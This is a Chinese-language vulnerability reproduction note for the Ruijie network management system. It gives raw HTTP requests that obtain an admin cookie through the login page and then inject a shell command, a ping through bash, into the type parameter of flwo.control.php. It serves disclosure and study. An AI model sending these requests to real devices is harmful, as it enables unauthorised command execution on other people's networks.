文章目录
- 免责声明
- 漏洞描述
- 漏洞原理
- 影响版本
- 漏洞复现
- 修复建议
免责声明
该文章只为学习和交流,请不要做违法乱纪的事情,如有与本人无关
漏洞描述
锐捷网管系统是由北京锐捷数据时代科技有限公司开发的新一代基于云的网络管理软件,以"数据时代创新网管与信息安全"为口号,定位于终端安全、IT运营及企业服务化管理统一解决方案。
漏洞原理
在该系统的/flow_control_pi/flwo.control.php的文件中存在命令执行参数
影响版本
不详
漏洞复现
用post请求访问/ddi/server/login.php页面并提交admin参数可以获得管理员的cookie
POST /ddi/server/login.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
username=admin&password=admin?
使用cookie向/flow_control_pi/flwo.control.php?a=getFlowGroup 提交type参数
POST /flow_control_pi/flwo.control.php?a=getFlowGroup HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
Cookie: RUIJIEID=q6g97tqc32rl4bl8h89gjub031; user=admin;
Accept-Encoding: gzip
Connection: close
type=|bash+-c+'ping+-c+4+ip'
修复建议
升级到最新版本